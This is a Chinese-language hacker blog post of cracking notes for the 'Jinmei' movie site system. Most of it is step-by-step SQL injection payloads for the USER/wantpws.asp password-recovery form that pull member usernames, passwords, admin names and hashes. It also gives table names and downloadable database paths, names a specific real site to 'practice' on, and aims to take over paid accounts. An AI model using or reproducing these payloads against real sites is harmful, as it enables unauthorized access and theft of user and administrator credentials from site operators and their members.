金梅电影系统破解笔记(破解率80%以上)
从我在265.com的黑客日记本中拷贝出,绝对珍藏!!!!!!!!
如果以后有机会,我会公开我的日记
金梅3几乎不存在了,如果有可以用
黄金眼(上篇14个后台那篇有上传的注册版)
不会用的可以看怪狗的黄金眼动画教程
或者臭要饭的写的绝世猜解SQL注入器(这可是个好东东啊)
下面的东西有些概要,基本上是看
黑客x档案4期和5期的总结出的笔记
针对现在网上的所有金梅版本好象都有效!!!!!!
不过那些收费站都是骗人的,里面全是盗连,坏连!!!!!!!!!
我破解了n个站点,只有几个是好的
特别注意!!!!:那些代码都是在USER/wantpws.asp页注入的
你注册用户名:lamianbu
密码提示问题:lamianbu
密友提示答案:(填入方法1和方法2中的代码)
其实,前两项,和第三项的开头随便填的,不相同也行
我都填a的
还要注意!!!!
返回页“你的密码是”后面其实不是密码!!!!!!!!!!
比如方法2前三次分别得到的是
id(没用)
用户名(登陆用)
密码(登陆用)
金梅4SQL注入
心情:2004-5-1421:58:26晴朗星期五收藏:
login.asp
Register
高级管理员登录.用名:,密码:,
Register高级管理员登录.用名:,密码:,
USER/wantpws.asp
如果你忘记了自己的密码
如果你忘记了自己的密码,请在如下表单里输入你的密码提示信
息!.你注册用户名:密码提示问题:密友提示答案:.返回首
页.
方法1
得注册用户名:
lamianbu'unionselectuseridfromuserswhereoklook=3or'0
oklook=x
0游1普2白3黄4钻(4手5钻)
得密码(可能不对应,所以推荐方法2):
注册用户名处填用户名'or'1=1
方法2
得用户id为xxx:
lamianbu'unionselectidfromuserswhereoklook=3or'0
得id对应用户名:
lamianbu'unionselectuseridfromuserswhereid=xxxor'0
得id对应密码:
lamianbu'unionselectpasswordfromuserswhereid=xxxor'0
得管理员用户名:
lamianbu'unionselectnamefrompasswordwhereid>=1or'0
得管理员密码:(金梅4有md5加密,看到的是16位乱码)
lamianbu'unionselectpwdfrompasswordwhereid>=1or'0
表名:金梅4为:fdg85675fd
会员版为:password
有些版本为:okwiantgo
验证管理员权限:
lamianbu'unionselectflagfrompasswordwhereid>=1
返回1超,2高,3初,4无
login.asp
findaccount.asp
构造一个变绝对路径
findaccount.asp?name=xxx&pwd=xxx
网际快车得数据库:
movie/admin9988.asp
金梅4为:data/admin2000.asp或data/admin2002.asp
下载后改为admin9988.mdb
拿这页练练手啊
破解出黄金帐号和密码请不要修改和公布(后来人也要练手啊)
登陆进去记得走时要退出登陆(一个帐号不能几人同时用的)
http://www.westedu.org/mov/USER/wantpws.asp
更多金梅去google找
实际上金梅系统没有这页也可以
构造出同版本的类似页进行注入
【金梅电影系统破解笔记(破解率80%以上)】相关文章:
★ Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范